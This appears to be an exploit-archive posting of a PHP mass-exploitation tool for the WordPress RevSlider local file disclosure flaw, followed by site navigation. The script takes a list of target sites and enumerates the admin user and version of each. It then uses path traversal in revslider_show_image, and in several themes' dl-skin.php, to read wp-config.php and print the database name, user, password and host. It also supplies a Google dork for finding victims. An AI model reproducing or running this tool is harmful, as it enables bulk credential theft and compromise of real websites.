WordPress RevSlider Local File Disclosure

WordPress RevSlider Local File Disclosure: Posted Dec 30, 2014; Authored by FarbodEZRaeL; WordPress RevSlider suffers from a local file disclosure vulnerability.; tags | exploit, local, info disclosure; SHA-256 | bbe49b75724bc6759e0e29e03a94716b56821ed2e435c3baf72f59a4744f8f34; Download | Favorite | View

WordPress RevSlider Local File Disclosure

# Exploit Title: [Wordpress RevSlider Plugin LFD]
# Google Dork: inurl:/admin-ajax.php?action=revslider_show_image
# Date: 12/29/14
# Exploit Author: FarbodEZRaeL
# Vendor Homepage: iranhack.org
# Software Link: wordpress.org
# Tested on: windows
#Exploit:
<html>
<head>
<title>Exploits Wordpress</title>
</head>
<body style="background-color: rebeccapurple;">

<pre><p><center style="color: aqua;">

=============================================================
=       Exploits Wordpress RevSlider Plugin LFD Vuln        =
=                                                           =
=                    Coded by FarbodEZRaeL                  =
=                    Iranhack Security team                 =
=                       www.iranhack.org                    =
=                     Fix bug Other Version                 =
=============================================================

<pre><href>
<form method='POST'>
<textarea name='sites' cols='45' rows='0'></textarea>
<br>
<input type='submit' value='Exploit' />
</form>

<?php

# Coded by FarbodEZRaeL
# Exploits Wordpress RevSlider Plugin LFD Vuln
@set_time_limit(0);
error_reporting(0);
$sites = explode("\r\n", $_POST['sites']);

foreach($sites as $site) {

$site = trim($site);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site");
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.0)");
$get = curl_exec($ch);
curl_close($ch);
if(preg_match("#WordPress (.*?)/>#", $get, $version)){
$str = str_replace('/>', "", $version[0]);
$str = str_replace('"', "", $str);
}
$users = @file_get_contents("$site/?author=1");
preg_match('/<title>;(.*?)<\/title>/si',$users,$user);
$wpuser = explode('|',$user[1]);
echo " <br>======================================</br>";
echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version :
".$str."<br>";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,
"$site/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01;
Windows NT 5.0)");
$xp = curl_exec ($ch);
curl_close($ch);
if(preg_match("#DB_USER#i",$xp)){
preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}<br>";
preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
echo "DB_USER:{$DB_USER[1]}<br>";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}<br>";

}

$lt =
array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php");
foreach($lt as $l){
$site = "$site/$l";
$process = curl_init($site);
curl_setopt($process, CURLOPT_TIMEOUT, 30);
curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
7.0; Windows NT 6.0)");
curl_setopt($process, CURLOPT_HEADER, TRUE);
curl_setopt($process, CURLOPT_POST, 1);
curl_setopt($process, CURLOPT_POSTFIELDS,
"_mysite_download_skin=../../../../../wp-config.php");
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
$return = curl_exec($process);
if(preg_match("#DB_USER#i",$return)){
preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}<br>";
preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
echo "DB_USER:{$DB_USER[1]}<br>";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}<br>";
break;
echo " <br>-----------------------------------</br>";
ob_implicit_flush(true);
ob_end_flush();
}
}
}

?>
</pre></p></center>

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

WordPress RevSlider Local File Disclosure

WordPress RevSlider Local File Disclosure

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress RevSlider Local File Disclosure

Share This

WordPress RevSlider Local File Disclosure

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems